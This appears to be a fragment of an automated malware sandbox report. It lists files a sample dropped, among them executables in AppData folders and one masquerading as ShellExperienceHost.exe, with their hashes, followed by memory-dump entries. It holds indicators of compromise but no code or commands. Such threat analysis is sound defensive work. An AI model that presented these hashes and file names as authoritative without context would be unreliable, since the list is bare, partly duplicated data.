a25656c1abc938eaa3464ff45c305e89417b2c25

SHA256
f66d9c77d511503d6d7621198c1054650339a3e4ee49601d87e073e26905676b

SHA512
d344c80c19ac34e5158292ddb172fc18c861c63c5f4fb3ec842a90134425b98290b718a656c76369d9e931cbecf5718f8ca9c1b751b93592ce15feb99dc331a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
d287d60aaf019246a1a8c5db68b8f41a

SHA1
a25656c1abc938eaa3464ff45c305e89417b2c25

SHA256
f66d9c77d511503d6d7621198c1054650339a3e4ee49601d87e073e26905676b

SHA512
d344c80c19ac34e5158292ddb172fc18c861c63c5f4fb3ec842a90134425b98290b718a656c76369d9e931cbecf5718f8ca9c1b751b93592ce15feb99dc331a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\lxxxxxx.exe
MD5
348865c449962bf4154b89d43640f4bb

SHA1
2079978d1f4a92402f5359c98b822f6587da9fce

SHA256
dbea34702c32688f055d9c56d3267a4d4da98adea992a7df123a2b3e8487018a

SHA512
bc72768c88759463cdd718c4f8bdb2f16cf8ef16bd0b6d4ee22ce16a3706a74dca583c3d95e6a5af7d4107ee456e25cbb601f70372ba15db4fba266251080778

Download Submit
C:\Users\Admin\AppData\Local\Temp\lxxxxxx.exe
MD5
348865c449962bf4154b89d43640f4bb

SHA1
2079978d1f4a92402f5359c98b822f6587da9fce

SHA256
dbea34702c32688f055d9c56d3267a4d4da98adea992a7df123a2b3e8487018a

SHA512
bc72768c88759463cdd718c4f8bdb2f16cf8ef16bd0b6d4ee22ce16a3706a74dca583c3d95e6a5af7d4107ee456e25cbb601f70372ba15db4fba266251080778

Download Submit
C:\Users\Admin\AppData\Roaming\1337\1.exe
MD5
ce8e8a32796ae98b7d11a2cfe5fd5b2b

SHA1
e6a823bb87767e165c8ef56a11bcd6f9c170de38

SHA256
b6f88899475f8027a5e8ead9bcc47e6e37f9edd3aa8fee0dc9707674e9dfc836

SHA512
37d2fa95e74cc396a74808964063075273c20883b116e2366498ecc30d36505ffd449abae524105ba6644863df862a230f98e380e4bde83a1a63161d522f3dd2

Download Submit
C:\Users\Admin\AppData\Roaming\1337\1.exe
MD5
ce8e8a32796ae98b7d11a2cfe5fd5b2b

SHA1
e6a823bb87767e165c8ef56a11bcd6f9c170de38

SHA256
b6f88899475f8027a5e8ead9bcc47e6e37f9edd3aa8fee0dc9707674e9dfc836

SHA512
37d2fa95e74cc396a74808964063075273c20883b116e2366498ecc30d36505ffd449abae524105ba6644863df862a230f98e380e4bde83a1a63161d522f3dd2

Download Submit
C:\Users\Admin\AppData\Roaming\1337\@asasinalex.exe
MD5
4447f458a0cf3bedb38f5cf9897c998c

SHA1
b3975f5bf7273821190e038ef9a11a54c02b5760

SHA256
24b93292dc2cb37fa8b990a0e548fbfe5d2ea88fc3b0228808915f14c5e85e86

SHA512
76f62b747019b571534997025aa5d15fdd578493db584f54e71298cf3be9a19721720780712302b7d643d979f7cb539ea8ca68671a03f95a21bd1d0e8920b96a

Download Submit
C:\Users\Admin\AppData\Roaming\1337\@asasinalex.exe
MD5
4447f458a0cf3bedb38f5cf9897c998c

SHA1
b3975f5bf7273821190e038ef9a11a54c02b5760

SHA256
24b93292dc2cb37fa8b990a0e548fbfe5d2ea88fc3b0228808915f14c5e85e86

SHA512
76f62b747019b571534997025aa5d15fdd578493db584f54e71298cf3be9a19721720780712302b7d643d979f7cb539ea8ca68671a03f95a21bd1d0e8920b96a

Download Submit
C:\Users\ShellExperienceHost.exe
MD5
348865c449962bf4154b89d43640f4bb

SHA1
2079978d1f4a92402f5359c98b822f6587da9fce

SHA256
dbea34702c32688f055d9c56d3267a4d4da98adea992a7df123a2b3e8487018a

SHA512
bc72768c88759463cdd718c4f8bdb2f16cf8ef16bd0b6d4ee22ce16a3706a74dca583c3d95e6a5af7d4107ee456e25cbb601f70372ba15db4fba266251080778

Download Submit
\??\pipe\crashpad_2828_ZRGQVKAYGDRRFRFI
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\crashpad_3164_IBUCYRAEGDIWJSQN
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\nsl3BB9.tmp\System.dll
MD5
0063d48afe5a0cdc02833145667b6641

SHA1
e7eb614805d183ecb1127c62decb1a6be1b4f7a8

SHA256
ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7

SHA512
71cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0

Download Submit
memory/96-140-0x0000000000000000-mapping.dmp

Download
memory/156-94-0x0000000000000000-mapping.dmp

Download
memory/200-39-0x0000000000000000-mapping.dmp

Download
memory/588-155-0x0000000000000000-mapping.dmp

Download
memory/744-4-0x0000000000A41000-0x0000000000A43000-memory.dmp

Filesize
8KB

Download
memory/744-2-0x0000000000A40000-0x00000000016FC000-memory.dmp

Filesize
12.7MB

Download
memory/744-5-0x0000000000A41000-0x0000000000A43000-memory.dmp

Filesize
8KB

Download
memory/744-3-0x0000000077854000-0x0000000077855000-memory.dmp

Filesize
4KB

Download
memory/776-47-0x0000000000000000-mapping.dmp

Download
memory/1176-40-0x0000000000000000-mapping.dmp

Download
memory/1352-28-0x0000000000000000-mapping.dmp

Download
memory/1364-48-0x0000000000000000-mapping.dmp

Download
memory/1504-21-0x0000000000000000-mapping.dmp

Download
memory/1556-64-0x0000000000000000-mapping.dmp

Download
memory/1556-67-0x00007FF78EFA0000-0x00007FF78F6C7000-memory.dmp

Filesize
7.2MB

Download
memory/1556-68-0x000001ABAEAF0000-0x000001ABAEB10000-memory.dmp

Filesize
128KB

Download
memory/1556-71-0x000001ABB05A0000-0x000001ABB05C0000-memory.dmp

Filesize
128KB

Download
memory/1676-161-0x0000000000000000-mapping.dmp

Download
memory/1684-96-0x0000000000000000-mapping.dmp

Download
memory/1848-148-0x0000000000000000-mapping.dmp

Download
memory/1976-20-0x0000000000000000-mapping.dmp

Download
memory/2004-34-0x0000000000090000-0x0000000000091000-memory.dmp

Filesize
4KB

Download
memory/2004-46-0x0000000006600000-0x0000000006601000-memory.dmp

Filesize
4KB

Download
memory/2004-45-0x0000000006060000-0x0000000006061000-memory.dmp

Filesize
4KB

Download
memory/2004-43-0x0000000005A50000-0x0000000005A51000-memory.dmp

Filesize
4KB

Download
memory/2004-41-0x00000000049C0000-0x00000000049C1000-memory.dmp

Filesize
4KB

Download
memory/2004-31-0x0000000072D90000-0x000000007347E000-memory.dmp

Filesize
6.9MB

Download
memory/2004-24-0x0000000000000000-mapping.dmp

Download
memory/2032-36-0x0000000000000000-mapping.dmp

Download
memory/2064-79-0x0000000000000000-mapping.dmp

Download
memory/2112-83-0x0000000000000000-mapping.dmp

Download
memory/2152-49-0x0000000000000000-mapping.dmp

Download
memory/2204-60-0x0000000000000000-mapping.dmp

Download
memory/2204-38-0x0000000000000000-mapping.dmp

Download
memory/2244-74-0x0000000000000000-mapping.dmp

Download
memory/2244-196-0x0000019431DC0000-0x0000019431DE0000-memory.dmp

Filesize
128KB

Download
memory/2244-77-0x00007FF78EFA0000-0x00007FF78F6C7000-memory.dmp

Filesize
7.2MB

Download
memory/2380-50-0x0000000000000000-mapping.dmp

Download
memory/2424-153-0x0000000000000000-mapping.dmp

Download
memory/2436-51-0x0000000000000000-mapping.dmp

Download
memory/2484-22-0x0000000000000000-mapping.dmp

Download
memory/2500-89-0x0000000000000000-mapping.dmp

Download
memory/2532-33-0x0000000000000000-mapping.dmp

Download
memory/2568-88-0x0000000000000000-mapping.dmp

Download
memory/2584-10-0x0000000000000000-mapping.dmp

Download
memory/2584-14-0x0000021F56230000-0x0000021F56244000-memory.dmp

Filesize
80KB

Download
memory/2592-102-0x0000000000000000-mapping.dmp

Download
memory/2592-127-0x0000027136790000-0x00000271367900F8-memory.dmp

Filesize
248B

Download
memory/2592-113-0x0000027136790000-0x00000271367900F8-memory.dmp

Filesize
248B

Download
memory/2592-124-0x0000027136790000-0x00000271367900F8-memory.dmp

Filesize
248B

Download
memory/3088-98-0x0000000000000000-mapping.dmp

Download
memory/3160-101-0x0000000000000000-mapping.dmp

Download
memory/3512-9-0x00007FFF6C6A0000-0x00007FFF6D08C000-memory.dmp

Filesize
9.9MB

Download
memory/3512-6-0x0000000000000000-mapping.dmp

Download
memory/3512-16-0x000001EC13E70000-0x000001EC13E71000-memory.dmp

Filesize
4KB

Download
memory/3512-44-0x000001EC14330000-0x000001EC14332000-memory.dmp

Filesize
8KB

Download
memory/3688-59-0x0000000000000000-mapping.dmp

Download
memory/3716-191-0x00000123D6D10000-0x00000123D6D100F8-memory.dmp

Filesize
248B

Download
memory/3740-91-0x00007FFF891D0000-0x00007FFF891D1000-memory.dmp

Filesize
4KB

Download
memory/3740-87-0x0000000000000000-mapping.dmp

Download
memory/3788-151-0x0000000000000000-mapping.dmp

Download
memory/3888-165-0x0000000000000000-mapping.dmp

Download
memory/3896-58-0x000002107E9A0000-0x000002107E9A2000-memory.dmp

Filesize
8KB

Download
memory/3896-55-0x00007FFF6C6A0000-0x00007FFF6D08C000-memory.dmp

Filesize
9.9MB

Download
memory/3896-52-0x0000000000000000-mapping.dmp

Download
memory/3944-42-0x0000000000000000-mapping.dmp

Download
memory/3952-13-0x0000000000000000-mapping.dmp

Download
memory/3976-149-0x0000000000000000-mapping.dmp

Download
memory/4076-23-0x0000000000000000-mapping.dmp

Download
memory/4104-123-0x0000020F030D0000-0x0000020F030D00F8-memory.dmp

Filesize
248B

Download
memory/4104-128-0x0000020F030D0000-0x0000020F030D00F8-memory.dmp

Filesize
248B

Download
memory/4104-104-0x0000000000000000-mapping.dmp

Download
memory/4104-114-0x0000020F030D0000-0x0000020F030D00F8-memory.dmp

Filesize
248B

Download
memory/4112-143-0x0000000000000000-mapping.dmp

Download
memory/4160-106-0x0000000000000000-mapping.dmp

Download
memory/4180-141-0x0000000000000000-mapping.dmp

Download
memory/4200-108-0x0000000000000000-mapping.dmp

Download
memory/4200-129-0x0000015E870F0000-0x0000015E870F00F8-memory.dmp

Filesize
248B

Download
memory/4200-125-0x0000015E870F0000-0x0000015E870F00F8-memory.dmp

Filesize
248B

Download
memory/4200-121-0x0000015E870F0000-0x0000015E870F00F8-memory.dmp

Filesize
248B

Download
memory/4336-159-0x0000000000000000-mapping.dmp

Download
memory/4428-111-0x0000000000000000-mapping.dmp

Download
memory/4580-115-0x0000000000000000-mapping.dmp

Download
memory/4596-117-0x0000000000000000-mapping.dmp

Download
memory/4608-118-0x0000000000000000-mapping.dmp

Download
memory/4612-192-0x00000194E0860000-0x00000194E08600F8-memory.dmp

Filesize
248B

Download
memory/4712-157-0x0000000000000000-mapping.dmp

Download
memory/4716-145-0x0000000000000000-mapping.dmp

Download
memory/4808-126-0x0000000000000000-mapping.dmp

Download
memory/4840-163-0x0000000000000000-mapping.dmp

Download
memory/4892-147-0x0000000000000000-mapping.dmp

Download
memory/4908-167-0x0000000000000000-mapping.dmp

Download
memory/4924-130-0x0000000000000000-mapping.dmp

Download
memory/4968-132-0x0000000000000000-mapping.dmp

Download
memory/4980-193-0x00000243A1360000-0x00000243A13600F8-memory.dmp

Filesize
248B

Download
memory/5008-134-0x0000000000000000-mapping.dmp

Download
memory/5048-136-0x0000000000000000-mapping.dmp

Download
memory/5088-138-0x0000000000000000-mapping.dmp

Download